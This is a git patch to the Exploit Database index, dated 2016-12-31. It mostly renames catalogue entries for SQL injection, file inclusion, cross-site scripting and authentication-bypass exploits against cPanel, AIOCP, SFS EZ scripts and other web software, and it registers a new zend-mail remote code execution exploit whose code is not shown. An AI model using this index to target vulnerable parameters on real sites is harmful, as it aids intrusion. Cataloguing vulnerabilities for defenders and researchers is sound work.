From c203af40e69f7e3a19ed1c8f8c3caccd928b243e Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Sat, 31 Dec 2016 05:01:17 +0000 Subject: [PATCH] DB: 2016-12-31 1 new exploits Cpanel - Authenticated (lastvisit.html domain) Arbitrary File Disclosure cPanel - Authenticated (lastvisit.html domain) Arbitrary File Disclosure pppBlog 0.3.8 - (randompic.php) System Disclosure pppBlog 0.3.8 - System Disclosure NetRisk 1.9.7 - (change_submit.php) Remote Password Change Exploit NetRisk 1.9.7 - Remote Password Change Exploit netrisk 1.9.7 - Cross-Site Scripting / SQL Injection NetRisk 1.9.7 - Cross-Site Scripting / SQL Injection Cpanel 11.x - 'Fantastico' Local File Inclusion (sec Bypass) cPanel 11.x - 'Fantastico' Local File Inclusion (sec Bypass) MyForum 1.3 - (lecture.php id) SQL Injection MyForum 1.3 - 'lecture.php' SQL Injection MyForum 1.3 - (padmin) Local File Inclusion MyForum 1.3 - 'padmin' Parameter Local File Inclusion e107 Plugin alternate_profiles - 'id' SQL Injection MyKtools 2.4 - (langage) Local File Inclusion e107 Plugin alternate_profiles - 'id' Parameter SQL Injection MyKtools 2.4 - 'langage' Parameter Local File Inclusion questcms - Cross-Site Scripting / Directory Traversal / SQL Injection AIOCP 1.4 - 'poll_id' SQL Injection QuestCMS - Cross-Site Scripting / Directory Traversal / SQL Injection AIOCP 1.4 - 'poll_id' Parameter SQL Injection PersianBB - 'iranian_music.php id' SQL Injection Agares ThemeSiteScript 1.0 (loadadminpage) - Remote File Inclusion PersianBB - 'id' Parameter SQL Injection Agares ThemeSiteScript 1.0 - 'loadadminpage' Parameter Remote File Inclusion Sepal SPBOARD 4.5 - (board.cgi) Remote Command Execution Sepal SPBOARD 4.5 - 'board.cgi' Remote Command Execution Venalsur on-line Booking Centre - (OfertaID) Cross-Site Scripting / SQL Injection Pro Traffic One - 'poll_results.php id' SQL Injection Venalsur on-line Booking Centre - Cross-Site Scripting / SQL Injection Pro Traffic One - 'poll_results.php' SQL Injection e107 Plugin lyrics_menu - 'lyrics_song.php l_id' SQL Injection e107 Plugin lyrics_menu - 'l_id' Parameter SQL Injection SFS EZ Adult Directory - 'Directory.php id' SQL Injection Logz podcast CMS 1.3.1 - (add_url.php art) SQL Injection cpanel 11.x - Cross-Site Scripting / Local File Inclusion SFS EZ Adult Directory - 'directory.php' SQL Injection Logz podcast CMS 1.3.1 - 'art' Parameter SQL Injection cPanel 11.x - Cross-Site Scripting / Local File Inclusion SFS EZ HotScripts-like Site - 'cid' SQL Injection SFS EZ HotScripts-like Site - 'cid' Parameter SQL Injection SFS EZ Hosting Directory - 'cat_id' SQL Injection SFS EZ Hosting Directory - 'cat_id' Parameter SQL Injection SFS EZ Home Business Directory - 'cat_id' SQL Injection SFS EZ Link Directory - 'cat_id' SQL Injection Adult Banner Exchange Website - (targetid) SQL Injection SFS EZ BIZ PRO - 'track.php id' SQL Injection SFS EZ Affiliate - 'cat_id' SQL Injection Article Publisher PRO 1.5 - (Authentication Bypass) SQL Injection SFS EZ Webring - (cat) SQL Injection SFS EZ Hot or Not - (phid) SQL Injection SFS EZ Software - 'id' SQL Injection SFS EZ Home Business Directory - 'cat_id' Parameter SQL Injection SFS EZ Link Directory - 'cat_id' Parameter SQL Injection Adult Banner Exchange Website - 'targetid' Parameter SQL Injection SFS EZ BIZ PRO - SQL Injection SFS EZ Affiliate - 'cat_id' Parameter SQL Injection Article Publisher PRO 1.5 - Authentication Bypass SFS EZ Webring - 'cat' Parameter SQL Injection SFS EZ Hot or Not - 'phid' Parameter SQL Injection SFS EZ Software - 'id' Parameter SQL Injection Article Publisher PRO - (userid) SQL Injection SFS EZ Auction - 'viewfaqs.php cat' Blind SQL Injection SFS EZ Career - 'content.php topic' SQL Injection SFS EZ Top Sites - 'topsite.php ts' SQL Injection SFS EZ Webstore - (where) SQL Injection SFS EZ Pub Site - 'Directory.php cat' SQL Injection SFS EZ Gaming Cheats - 'id' SQL Injection Article Publisher PRO - 'userid' Parameter SQL Injection SFS EZ Auction - Blind SQL Injection SFS EZ Career - SQL Injection SFS EZ Top Sites - SQL Injection SFS EZ Webstore - 'where' Parameter SQL Injection SFS EZ Pub Site - SQL Injection SFS EZ Gaming Cheats - SQL Injection GO4I.NET ASP Forum 1.0 - (forum.asp iFor) SQL Injection YourFreeWorld Programs Rating - 'details.php id' SQL Injection GO4I.NET ASP Forum 1.0 - SQL Injection YourFreeWorld Programs Rating - SQL Injection Shahrood - 'ndetail.php id' Blind SQL Injection YourFreeWorld Downline Builder - 'id' SQL Injection YourFreeWorld Banner Management - 'id' SQL Injection YourFreeWorld Blog Blaster - 'id' SQL Injection YourFreeWorld Autoresponder Hosting - 'id' SQL Injection YourFreeWorld Forced Matrix Script - 'id' SQL Injection YourFreeWorld Short Url & Url Tracker - 'id' SQL Injection YourFreeWorld Viral Marketing - 'id' SQL Injection YourFreeWorld Scrolling Text Ads - 'id' SQL Injection YourFreeWorld Reminder Service - 'id' SQL Injection YourFreeWorld Classifieds Blaster - 'id' SQL Injection Shahrood - Blind SQL Injection YourFreeWorld Downline Builder - 'tr.php' SQL Injection YourFreeWorld Banner Management - SQL Injection YourFreeWorld Blog Blaster - 'tr.php' SQL Injection YourFreeWorld Autoresponder Hosting - 'tr.php' SQL Injection YourFreeWorld Forced Matrix Script - SQL Injection YourFreeWorld Short Url & Url Tracker - SQL Injection YourFreeWorld Viral Marketing - SQL Injection YourFreeWorld Scrolling Text Ads - SQL Injection YourFreeWorld Reminder Service - SQL Injection YourFreeWorld Classifieds Blaster - SQL Injection Downline Goldmine Builder - 'tr.php id' SQL Injection Downline Goldmine Category Addon - 'id' SQL Injection YourFreeWorld Classifieds Hosting - 'id' SQL Injection YourFreeWorld URL Rotator - 'id' SQL Injection Downline Goldmine paidversion - 'tr.php id' SQL Injection Downline Goldmine newdownlinebuilder - 'tr.php id' SQL Injection YourFreeWorld Shopping Cart - 'index.php c' Blind SQL Injection Maran PHP Shop - 'prod.php cat' SQL Injection Downline Goldmine Builder - SQL Injection Downline Goldmine Category Addon - SQL Injection YourFreeWorld Classifieds Hosting - SQL Injection YourFreeWorld URL Rotator - SQL Injection Downline Goldmine paidversion - SQL Injection Downline Goldmine newdownlinebuilder - SQL Injection YourFreeWorld Shopping Cart - Blind SQL Injection Maran PHP Shop - 'prod.php' SQL Injection 1st News - 'products.php id' SQL Injection 1st News - SQL Injection BosClassifieds - 'cat_id' SQL Injection BosClassifieds - 'cat_id' Parameter SQL Injection MatPo Link 1.2b - (view.php id) SQL Injection MatPo Link 1.2b - SQL Injection Apoll 0.7b - (Authentication Bypass) SQL Injection Apoll 0.7b - Authentication Bypass pppBlog 0.3.11 - (randompic.php) File Disclosure TBmnetCMS 1.0 - (index.php content) Local File Inclusion pppBlog 0.3.11 - File Disclosure TBmnetCMS 1.0 - Local File Inclusion WEBBDOMAIN Post Card 1.02 - 'catid' SQL Injection WEBBDOMAIN Post Card 1.02 - 'catid' Parameter SQL Injection nicLOR Puglia Landscape - 'id' Local File Inclusion nicLOR Puglia Landscape - Local File Inclusion Vibro-School-CMS - (nID) SQL Injection Vibro-School-CMS - 'nID' Parameter SQL Injection WEBBDOMAIN Petition 1.02/2.0/3.0 - (Authentication Bypass) SQL Injection WEBBDOMAIN Polls 1.01 - (Authentication Bypass) SQL Injection WEBBDOMAIN Quiz 1.02 - (Authentication Bypass) SQL Injection WEBBDOMAIN Webshop 1.02 - (Authentication Bypass) SQL Injection Simple Document Management System 1.1.4 - SQL Injection Authentication Bypass Tours Manager 1.0 - (cityview.php cityid) SQL Injection WEBBDOMAIN Post Card 1.02 - (Authentication Bypass) SQL Injection WEBBDOMAIN Petition 1.02/2.0/3.0 - Authentication Bypass WEBBDOMAIN Polls 1.01 - Authentication Bypass WEBBDOMAIN Quiz 1.02 - Authentication Bypass WEBBDOMAIN Webshop 1.02 - Authentication Bypass Simple Document Management System 1.1.4 - Authentication Bypass Tours Manager 1.0 - SQL Injection WEBBDOMAIN Post Card 1.02 - Authentication Bypass PHPX 3.5.16 - (news_id) SQL Injection Pre Podcast Portal - 'Tour.php id' SQL Injection PHPX 3.5.16 - 'news_id' Parameter SQL Injection Pre Podcast Portal - SQL Injection Graugon PHP Article Publisher 1.0 - (SQL Injection / Cookie Handling) Multiple Remote Vulnerabilities Graugon PHP Article Publisher 1.0 - SQL Injection / Cookie Handling Absolute Form Processor XE-V 1.5 - (Authentication Bypass) SQL Injection Absolute Form Processor XE-V 1.5 - Authentication Bypass MyForum 1.3 - (Authentication Bypass) SQL Injection MyForum 1.3 - Authentication Bypass Cpanel 11.25 - Cross-Site Request Forgery (Add FTP Account) cPanel 11.25 - Cross-Site Request Forgery (Add FTP Account) Simple Document Management System (SDMS) - SQL Injection Simple Document Management System - SQL Injection Cpanel 11.x - Cross-Site Request Forgery (Edit E-mail) cPanel 11.x - Cross-Site Request Forgery (Edit E-mail) PHPMyForum 4.0 - 'index.php' page Parameter Cross-Site Scripting PHPMyForum 4.0 - 'page' Parameter Cross-Site Scripting Cpanel 10 - Select.HTML Cross-Site Scripting cPanel 10 - Select.HTML Cross-Site Scripting CPanel 5-10 - SUID Wrapper Privilege Escalation cPanel 5-10 - SUID Wrapper Privilege Escalation AIOCP 1.3.x - 'cp_forum_view.php' Multiple Parameter Cross-Site Scripting AIOCP 1.3.x - 'cp_dpage.php' choosed_language Parameter Cross-Site Scripting AIOCP 1.3.x - 'cp_show_ec_products.php' order_field Parameter Cross-Site Scripting AIOCP 1.3.x - 'cp_users_online.php order_field Parameter Cross-Site Scripting AIOCP 1.3.x - 'cp_links_search.php' orderdir Parameter Cross-Site Scripting AIOCP 1.3.x - '/admin/code/index.php' load_page Parameter Remote File Inclusion AIOCP 1.3.x - 'cp_dpage.php' choosed_language Parameter SQL Injection AIOCP 1.3.x - 'cp_news.php' Multiple Parameter SQL Injection AIOCP 1.3.x - 'cp_forum_view.php' choosed_language Parameter SQL Injection AIOCP 1.3.x - 'cp_edit_user.php' choosed_language Parameter SQL Injection AIOCP 1.3.x - 'cp_newsletter.php' Multiple Parameter SQL Injection AIOCP 1.3.x - 'cp_links.php' Multiple Parameter SQL Injection AIOCP 1.3.x - 'cp_contact_us.php' choosed_language Parameter SQL Injection AIOCP 1.3.x - 'cp_show_ec_products.php' Multiple Parameter SQL Injection AIOCP 1.3.x - 'cp_login.php' choosed_language Parameter SQL Injection AIOCP 1.3.x - 'cp_users_online.php' order_field Parameter SQL Injection AIOCP 1.3.x - 'cp_codice_fiscale.php' choosed_language Parameter SQL Injection AIOCP 1.3.x - 'cp_links_search.php' orderdir Parameter SQL Injection AIOCP 1.3.x - 'cp_forum_view.php' Cross-Site Scripting AIOCP 1.3.x - 'cp_dpage.php' Cross-Site Scripting AIOCP 1.3.x - 'cp_show_ec_products.php' Cross-Site Scripting AIOCP 1.3.x - 'cp_users_online.php' Cross-Site Scripting AIOCP 1.3.x - 'cp_links_search.php' Cross-Site Scripting AIOCP 1.3.x - 'load_page' Parameter Remote File Inclusion AIOCP 1.3.x - 'cp_dpage.php' SQL Injection AIOCP 1.3.x - 'cp_news.php' SQL Injection AIOCP 1.3.x - 'cp_forum_view.php' SQL Injection AIOCP 1.3.x - 'cp_edit_user.php' SQL Injection AIOCP 1.3.x - 'cp_newsletter.php' SQL Injection AIOCP 1.3.x - 'cp_links.php' SQL Injection AIOCP 1.3.x - 'cp_contact_us.php' SQL Injection AIOCP 1.3.x - 'cp_show_ec_products.php' SQL Injection AIOCP 1.3.x - 'cp_login.php' SQL Injection AIOCP 1.3.x - 'cp_users_online.php' SQL Injection AIOCP 1.3.x - 'cp_codice_fiscale.php' SQL Injection AIOCP 1.3.x - 'cp_links_search.php' SQL Injection CPanel 10 - DNSlook.HTML Cross-Site Scripting cPanel 10 - DNSlook.HTML Cross-Site Scripting CPanel 11 Beta - Multiple Cross-Site Scripting Vulnerabilities cPanel 11 Beta - Multiple Cross-Site Scripting Vulnerabilities CPanel 11 BoxTrapper - Manage.HTML Cross-Site Scripting cPanel 11 BoxTrapper - Manage.HTML Cross-Site Scripting CPanel 11 - PassWDMySQL Cross-Site Scripting cPanel 11 - PassWDMySQL Cross-Site Scripting CPanel 10.9.1 - Resname Parameter Cross-Site Scripting cPanel 10.9.1 - Resname Parameter Cross-Site Scripting netRisk 1.9.7 - 'index.php' Remote File Inclusion NetRisk 1.9.7 - 'index.php' Remote File Inclusion YourFreeWorld Downline Builder Pro - 'id' Parameter SQL Injection YourFreeWorld Downline Builder Pro - 'tr.php' SQL Injection XIGLA Absolute Form Processor XE 1.5 - 'login.asp' SQL Injection Absolute Form Processor XE 1.5 - 'login.asp' SQL Injection TBmnetCMS 1.0 - 'content' Parameter Cross-Site Scripting TBmnetCMS 1.0 - Cross-Site Scripting pppBLOG 0.3 - 'search.php' Cross-Site Scripting Zend Framework / zend-mail < 2.4.11 - Remote Code Execution --- files.csv | 228 ++++++++++++++++---------------- platforms/php/webapps/28660.php | 2 +- platforms/php/webapps/28917.txt | 6 +- platforms/php/webapps/28918.txt | 2 +- platforms/php/webapps/28919.txt | 2 +- platforms/php/webapps/28920.txt | 2 +- platforms/php/webapps/28921.txt | 2 +- platforms/php/webapps/35517.txt | 9 -- platforms/php/webapps/40979.php | 96 ++++++++++++++ 9 files changed, 218 insertions(+), 131 deletions(-) delete mode 100755 platforms/php/webapps/35517.txt create mode 100755 platforms/php/webapps/40979.php diff --git a/files.csv b/files.csv index 88bb43d40..c3a308e63 100644 --- a/files.csv +++ b/files.csv @@ -9974,7 +9974,7 @@ id,file,description,date,author,platform,type,port 8986,platforms/windows/remote/8986.txt,"Edraw PDF Viewer Component < 3.2.0.126 - ActiveX Insecure Method",2009-06-18,Jambalaya,windows,remote,0 9002,platforms/windows/remote/9002.c,"Bopup Communications Server 3.2.26.5460 - Remote SYSTEM Exploit",2009-06-22,mu-b,windows,remote,19810 9031,platforms/windows/remote/9031.py,"Bopup Communications Server 3.2.26.5460 - Remote Buffer Overflow (SEH)",2009-06-29,His0k4,windows,remote,19810 -9039,platforms/multiple/remote/9039.txt,"Cpanel - Authenticated (lastvisit.html domain) Arbitrary File Disclosure",2009-06-29,SecurityRules,multiple,remote,0 +9039,platforms/multiple/remote/9039.txt,"cPanel - Authenticated (lastvisit.html domain) Arbitrary File Disclosure",2009-06-29,SecurityRules,multiple,remote,0 9065,platforms/windows/remote/9065.c,"Green Dam - Remote Change System Time Exploit",2009-07-01,"Anti GD",windows,remote,0 9066,platforms/hardware/remote/9066.txt,"ARD-9808 DVR Card Security Camera - Arbitrary Config Disclosure",2009-07-01,Septemb0x,hardware,remote,0 9093,platforms/windows/remote/9093.txt,"Microsoft Windows live messenger plus! fileserver 1.0 - Directory Traversal",2009-07-09,joepie91,windows,remote,0 @@ -16250,7 +16250,7 @@ id,file,description,date,author,platform,type,port 1849,platforms/asp/webapps/1849.htm,"Speedy ASP Forum - 'profileupdate.asp' User Pass Change Exploit",2006-05-29,ajann,asp,webapps,0 1850,platforms/asp/webapps/1850.htm,"Nukedit CMS 4.9.6 - Unauthorized Admin Add",2006-05-29,FarhadKey,asp,webapps,0 1851,platforms/php/webapps/1851.txt,"gnopaste 0.5.3 - 'common.php' Remote File Inclusion",2006-05-30,SmokeZ,php,webapps,0 -1853,platforms/php/webapps/1853.php,"pppBlog 0.3.8 - (randompic.php) System Disclosure",2006-05-31,rgod,php,webapps,0 +1853,platforms/php/webapps/1853.php,"pppBlog 0.3.8 - System Disclosure",2006-05-31,rgod,php,webapps,0 1854,platforms/php/webapps/1854.txt,"Ottoman CMS 1.1.3 - '?default_path=' Remote File Inclusion (1)",2006-05-31,Kacper,php,webapps,0 1855,platforms/php/webapps/1855.txt,"metajour 2.1 - (system_path) Remote File Inclusion",2006-05-31,Kacper,php,webapps,0 1857,platforms/php/webapps/1857.pl,"TinyPHP Forum 3.6 - 'profile.php' Remote Code Execution",2006-06-01,Hessam-x,php,webapps,0 @@ -18232,7 +18232,7 @@ id,file,description,date,author,platform,type,port 4838,platforms/php/webapps/4838.txt,"snetworks PHP Classifieds 5.0 - Remote File Inclusion",2008-01-05,Crackers_Child,php,webapps,0 4840,platforms/php/webapps/4840.php,"Tribisur 2.0 - SQL Injection",2008-01-05,x0kster,php,webapps,0 4841,platforms/php/webapps/4841.txt,"Invision Power Board 2.1.7 - ACTIVE Cross-Site Scripting / SQL Injection",2008-01-05,"Eugene Minaev",php,webapps,0 -4842,platforms/php/webapps/4842.pl,"NetRisk 1.9.7 - (change_submit.php) Remote Password Change Exploit",2008-01-05,Cod3rZ,php,webapps,0 +4842,platforms/php/webapps/4842.pl,"NetRisk 1.9.7 - Remote Password Change Exploit",2008-01-05,Cod3rZ,php,webapps,0 4843,platforms/php/webapps/4843.txt,"MODx CMS 0.9.6.1 - Multiple Vulnerabilities",2008-01-05,BugReport.IR,php,webapps,0 4844,platforms/php/webapps/4844.txt,"WordPress Plugin Wp-FileManager 1.2 - Arbitrary File Upload",2008-01-06,Houssamix,php,webapps,0 4845,platforms/php/webapps/4845.pl,"RunCMS Newbb_plus 0.92 - Client IP SQL Injection",2008-01-06,"Eugene Minaev",php,webapps,0 @@ -18242,7 +18242,7 @@ id,file,description,date,author,platform,type,port 4849,platforms/php/webapps/4849.txt,"LoudBlog 0.6.1 - 'parsedpage' Parameter Remote Code Execution",2008-01-06,"Eugene Minaev",php,webapps,0 4850,platforms/php/webapps/4850.txt,"Horde Web-Mail 3.x - 'go.php' Remote File Disclosure",2008-01-06,"Eugene Minaev",php,webapps,0 4851,platforms/php/webapps/4851.txt,"CuteNews 1.1.1 - 'html.php' Remote Code Execution",2008-01-06,"Eugene Minaev",php,webapps,0 -4852,platforms/php/webapps/4852.txt,"netrisk 1.9.7 - Cross-Site Scripting / SQL Injection",2008-01-06,"Virangar Security",php,webapps,0 +4852,platforms/php/webapps/4852.txt,"NetRisk 1.9.7 - Cross-Site Scripting / SQL Injection",2008-01-06,"Virangar Security",php,webapps,0 4853,platforms/php/webapps/4853.php,"DCP-Portal 6.11 - SQL Injection",2008-01-06,x0kster,php,webapps,0 4854,platforms/php/webapps/4854.txt,"SineCMS 2.3.5 - Local File Inclusion / Remote Code Execution",2008-01-06,KiNgOfThEwOrLd,php,webapps,0 4855,platforms/php/webapps/4855.txt,"Shop-Script 2.0 - 'index.php' Remote File Disclosure",2008-01-06,Fisher762,php,webapps,0 @@ -19459,7 +19459,7 @@ id,file,description,date,author,platform,type,port 6456,platforms/php/webapps/6456.txt,"Free PHP VX Guestbook 1.06 - Arbitrary Database Backup",2008-09-13,SirGod,php,webapps,0 6457,platforms/php/webapps/6457.txt,"Free PHP VX Guestbook 1.06 - Insecure Cookie Handling",2008-09-14,Stack,php,webapps,0 6460,platforms/php/webapps/6460.txt,"Kasseler CMS 1.1.0/1.2.0 Lite - SQL Injection",2008-09-14,~!Dok_tOR!~,php,webapps,0 -6461,platforms/php/webapps/6461.txt,"Cpanel 11.x - 'Fantastico' Local File Inclusion (sec Bypass)",2008-09-14,joker_1,php,webapps,0 +6461,platforms/php/webapps/6461.txt,"cPanel 11.x - 'Fantastico' Local File Inclusion (sec Bypass)",2008-09-14,joker_1,php,webapps,0 6462,platforms/php/webapps/6462.pl,"CzarNews 1.20 - 'cookie' SQL Injection",2008-09-15,StAkeR,php,webapps,0 6464,platforms/php/webapps/6464.txt,"CzarNews 1.20 - (Account Hijacking) SQL Injection",2008-09-15,0ut0fbound,php,webapps,0 6465,platforms/php/webapps/6465.txt,"Pre Real Estate Listings - 'search.php' SQL Injection",2008-09-15,JosS,php,webapps,0 @@ -19742,38 +19742,38 @@ id,file,description,date,author,platform,type,port 6839,platforms/php/webapps/6839.txt,"PozScripts Classified Auctions - 'gotourl.php id' SQL Injection",2008-10-26,"Hussin X",php,webapps,0 6842,platforms/php/webapps/6842.txt,"WordPress Plugin Media Holder - SQL Injection",2008-10-26,boom3rang,php,webapps,0 6843,platforms/php/webapps/6843.txt,"SFS Ez Forum - SQL Injection",2008-10-26,Hurley,php,webapps,0 -6844,platforms/php/webapps/6844.pl,"MyForum 1.3 - (lecture.php id) SQL Injection",2008-10-26,Vrs-hCk,php,webapps,0 +6844,platforms/php/webapps/6844.pl,"MyForum 1.3 - 'lecture.php' SQL Injection",2008-10-26,Vrs-hCk,php,webapps,0 6845,platforms/cgi/webapps/6845.txt,"Ads Pro - 'dhtml.pl' Remote Command Execution",2008-10-26,S0l1D,cgi,webapps,0 -6846,platforms/php/webapps/6846.txt,"MyForum 1.3 - (padmin) Local File Inclusion",2008-10-27,Vrs-hCk,php,webapps,0 +6846,platforms/php/webapps/6846.txt,"MyForum 1.3 - 'padmin' Parameter Local File Inclusion",2008-10-27,Vrs-hCk,php,webapps,0 6847,platforms/php/webapps/6847.txt,"Persia BME E-Catalogue - SQL Injection",2008-10-27,BugReport.IR,php,webapps,0 6848,platforms/php/webapps/6848.txt,"TlAds 1.0 - Remote Insecure Cookie Handling",2008-10-27,x0r,php,webapps,0 -6849,platforms/php/webapps/6849.txt,"e107 Plugin alternate_profiles - 'id' SQL Injection",2008-10-27,boom3rang,php,webapps,0 -6850,platforms/php/webapps/6850.txt,"MyKtools 2.4 - (langage) Local File Inclusion",2008-10-27,x0r,php,webapps,0 +6849,platforms/php/webapps/6849.txt,"e107 Plugin alternate_profiles - 'id' Parameter SQL Injection",2008-10-27,boom3rang,php,webapps,0 +6850,platforms/php/webapps/6850.txt,"MyKtools 2.4 - 'langage' Parameter Local File Inclusion",2008-10-27,x0r,php,webapps,0 6852,platforms/php/webapps/6852.pl,"e107 Plugin EasyShop - 'category_id' Parameter Blind SQL Injection",2008-10-27,StAkeR,php,webapps,0 -6853,platforms/php/webapps/6853.txt,"questcms - Cross-Site Scripting / Directory Traversal / SQL Injection",2008-10-27,d3b4g,php,webapps,0 -6854,platforms/php/webapps/6854.txt,"AIOCP 1.4 - 'poll_id' SQL Injection",2008-10-27,ExSploiters,php,webapps,0 +6853,platforms/php/webapps/6853.txt,"QuestCMS - Cross-Site Scripting / Directory Traversal / SQL Injection",2008-10-27,d3b4g,php,webapps,0 +6854,platforms/php/webapps/6854.txt,"AIOCP 1.4 - 'poll_id' Parameter SQL Injection",2008-10-27,ExSploiters,php,webapps,0 6855,platforms/php/webapps/6855.txt,"MyKtools 2.4 - Arbitrary Database Backup",2008-10-27,Stack,php,webapps,0 6856,platforms/php/webapps/6856.txt,"e107 Plugin BLOG Engine 2.1.4 - SQL Injection",2008-10-28,ZoRLu,php,webapps,0 6857,platforms/php/webapps/6857.txt,"MyForum 1.3 - Insecure Cookie Handling",2008-10-28,Stack,php,webapps,0 -6858,platforms/php/webapps/6858.txt,"PersianBB - 'iranian_music.php id' SQL Injection",2008-10-28,"Hussin X",php,webapps,0 -6859,platforms/php/webapps/6859.txt,"Agares ThemeSiteScript 1.0 (loadadminpage) - Remote File Inclusion",2008-10-28,DaRkLiFe,php,webapps,0 +6858,platforms/php/webapps/6858.txt,"PersianBB - 'id' Parameter SQL Injection",2008-10-28,"Hussin X",php,webapps,0 +6859,platforms/php/webapps/6859.txt,"Agares ThemeSiteScript 1.0 - 'loadadminpage' Parameter Remote File Inclusion",2008-10-28,DaRkLiFe,php,webapps,0 6860,platforms/php/webapps/6860.txt,"TlGuestBook 1.2 - Insecure Cookie Handling",2008-10-28,x0r,php,webapps,0 6861,platforms/php/webapps/6861.pl,"H2O-CMS 3.4 - Remote Command Execution (mq = off)",2008-10-28,StAkeR,php,webapps,0 6862,platforms/php/webapps/6862.txt,"H2O-CMS 3.4 - Insecure Cookie Handling",2008-10-29,Stack,php,webapps,0 -6864,platforms/cgi/webapps/6864.txt,"Sepal SPBOARD 4.5 - (board.cgi) Remote Command Execution",2008-10-29,GoLd_M,cgi,webapps,0 +6864,platforms/cgi/webapps/6864.txt,"Sepal SPBOARD 4.5 - 'board.cgi' Remote Command Execution",2008-10-29,GoLd_M,cgi,webapps,0 6865,platforms/php/webapps/6865.txt,"e107 plugin fm pro 1 - File Disclosure / Arbitrary File Upload / Directory Traversal",2008-10-29,GoLd_M,php,webapps,0 6866,platforms/php/webapps/6866.pl,"7Shop 1.1 - Arbitrary File Upload",2008-10-29,t0pP8uZz,php,webapps,0 6867,platforms/php/webapps/6867.pl,"WordPress Plugin E-Commerce 3.4 - Arbitrary File Upload",2008-10-29,t0pP8uZz,php,webapps,0 6868,platforms/php/webapps/6868.pl,"Mambo Component SimpleBoard 1.0.1 - Arbitrary File Upload",2008-10-29,t0pP8uZz,php,webapps,0 6869,platforms/php/webapps/6869.txt,"WebCards 1.3 - SQL Injection",2008-10-29,t0pP8uZz,php,webapps,0 6874,platforms/php/webapps/6874.txt,"Harlandscripts Pro Traffic One - 'mypage.php' SQL Injection",2008-10-29,"Beenu Arora",php,webapps,0 -6876,platforms/php/webapps/6876.txt,"Venalsur on-line Booking Centre - (OfertaID) Cross-Site Scripting / SQL Injection",2008-10-29,d3b4g,php,webapps,0 -6877,platforms/php/webapps/6877.txt,"Pro Traffic One - 'poll_results.php id' SQL Injection",2008-10-29,"Hussin X",php,webapps,0 +6876,platforms/php/webapps/6876.txt,"Venalsur on-line Booking Centre - Cross-Site Scripting / SQL Injection",2008-10-29,d3b4g,php,webapps,0 +6877,platforms/php/webapps/6877.txt,"Pro Traffic One - 'poll_results.php' SQL Injection",2008-10-29,"Hussin X",php,webapps,0 6879,platforms/php/webapps/6879.txt,"MyPHP Forum 3.0 - Edit Topics/Blind SQL Injection",2008-10-30,StAkeR,php,webapps,0 6881,platforms/php/webapps/6881.txt,"Absolute File Send 1.0 - Remote Cookie Handling",2008-10-30,Hakxer,php,webapps,0 6882,platforms/php/webapps/6882.txt,"Absolute Podcast 1.0 - Remote Insecure Cookie Handling",2008-10-30,Hakxer,php,webapps,0 6883,platforms/php/webapps/6883.txt,"Absolute Poll Manager XE 4.1 - Cookie Handling",2008-10-30,Hakxer,php,webapps,0 -6885,platforms/php/webapps/6885.txt,"e107 Plugin lyrics_menu - 'lyrics_song.php l_id' SQL Injection",2008-10-31,ZoRLu,php,webapps,0 +6885,platforms/php/webapps/6885.txt,"e107 Plugin lyrics_menu - 'l_id' Parameter SQL Injection",2008-10-31,ZoRLu,php,webapps,0 6886,platforms/php/webapps/6886.txt,"Tribiq CMS 5.0.9a (Beta) - Insecure Cookie Handling",2008-10-31,ZoRLu,php,webapps,0 6887,platforms/php/webapps/6887.txt,"Cybershade CMS 0.2b - Remote File Inclusion",2008-10-31,w0cker,php,webapps,0 6888,platforms/php/webapps/6888.txt,"Tribiq CMS 5.0.10a (Windows) - Local File Inclusion",2008-10-31,GoLd_M,php,webapps,0 @@ -19783,101 +19783,101 @@ id,file,description,date,author,platform,type,port 6892,platforms/php/webapps/6892.txt,"Absolute Live Support 5.1 - Insecure Cookie Handling",2008-10-31,Hakxer,php,webapps,0 6893,platforms/php/webapps/6893.txt,"Absolute Control Panel XE 1.5 - Insecure Cookie Handling",2008-10-31,Hakxer,php,webapps,0 6894,platforms/php/webapps/6894.txt,"SFS EZ Gaming Directory - 'directory.php' SQL Injection",2008-10-31,Hurley,php,webapps,0 -6895,platforms/php/webapps/6895.txt,"SFS EZ Adult Directory - 'Directory.php id' SQL Injection",2008-10-31,Hurley,php,webapps,0 -6896,platforms/php/webapps/6896.txt,"Logz podcast CMS 1.3.1 - (add_url.php art) SQL Injection",2008-10-31,ZoRLu,php,webapps,0 -6897,platforms/php/webapps/6897.txt,"cpanel 11.x - Cross-Site Scripting / Local File Inclusion",2008-10-31,"Khashayar Fereidani",php,webapps,0 +6895,platforms/php/webapps/6895.txt,"SFS EZ Adult Directory - 'directory.php' SQL Injection",2008-10-31,Hurley,php,webapps,0 +6896,platforms/php/webapps/6896.txt,"Logz podcast CMS 1.3.1 - 'art' Parameter SQL Injection",2008-10-31,ZoRLu,php,webapps,0 +6897,platforms/php/webapps/6897.txt,"cPanel 11.x - Cross-Site Scripting / Local File Inclusion",2008-10-31,"Khashayar Fereidani",php,webapps,0 6898,platforms/php/webapps/6898.txt,"U-Mail Webmail 4.91 - 'edit.php' Arbitrary File Write",2008-10-31,"Shennan Wang",php,webapps,0 6900,platforms/php/webapps/6900.txt,"Absolute News Manager 5.1 - Insecure Cookie Handling",2008-10-31,Hakxer,php,webapps,0 6901,platforms/php/webapps/6901.txt,"Absolute News Feed 1.0 - Remote Insecure Cookie Handling",2008-10-31,Hakxer,php,webapps,0 6902,platforms/php/webapps/6902.txt,"Absolute FAQ Manager 6.0 - Insecure Cookie Handling",2008-10-31,Hakxer,php,webapps,0 -6903,platforms/php/webapps/6903.txt,"SFS EZ HotScripts-like Site - 'cid' SQL Injection",2008-10-31,TR-ShaRk,php,webapps,0 +6903,platforms/php/webapps/6903.txt,"SFS EZ HotScripts-like Site - 'cid' Parameter SQL Injection",2008-10-31,TR-ShaRk,php,webapps,0 6904,platforms/php/webapps/6904.txt,"Absolute NewsLetter 6.1 - Insecure Cookie Handling",2008-10-31,x0r,php,webapps,0 -6905,platforms/php/webapps/6905.txt,"SFS EZ Hosting Directory - 'cat_id' SQL Injection",2008-10-31,BeyazKurt,php,webapps,0 +6905,platforms/php/webapps/6905.txt,"SFS EZ Hosting Directory - 'cat_id' Parameter SQL Injection",2008-10-31,BeyazKurt,php,webapps,0 6906,platforms/php/webapps/6906.txt,"SFS EZ Gaming Directory - 'cat_id' Parameter SQL Injection",2008-10-31,BeyazKurt,php,webapps,0 -6907,platforms/php/webapps/6907.txt,"SFS EZ Home Business Directory - 'cat_id' SQL Injection",2008-10-31,BeyazKurt,php,webapps,0 -6908,platforms/php/webapps/6908.txt,"SFS EZ Link Directory - 'cat_id' SQL Injection",2008-10-31,BeyazKurt,php,webapps,0 